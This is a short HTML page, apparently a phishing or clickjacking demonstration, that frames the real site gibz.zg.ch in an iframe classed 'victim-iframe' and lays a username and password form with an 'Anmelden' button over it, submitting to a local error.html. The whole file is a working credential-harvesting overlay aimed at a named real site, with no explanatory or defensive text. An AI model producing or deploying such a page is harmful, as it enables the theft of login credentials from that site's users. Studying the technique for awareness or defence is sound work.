
<html>
    <head>
        <link rel="stylesheet" href="style.css"/>
    </head>
    <body>
        <iframe src="https://gibz.zg.ch/" class="victim-iframe"></iframe>
        <form class="login-form" action="error.html">
            <input name="username" id="username"/>
            <input name="password" id="password" type="password"/>
            <button type="submit" id="submit">Anmelden</button>
        </form>
    </body>
</html>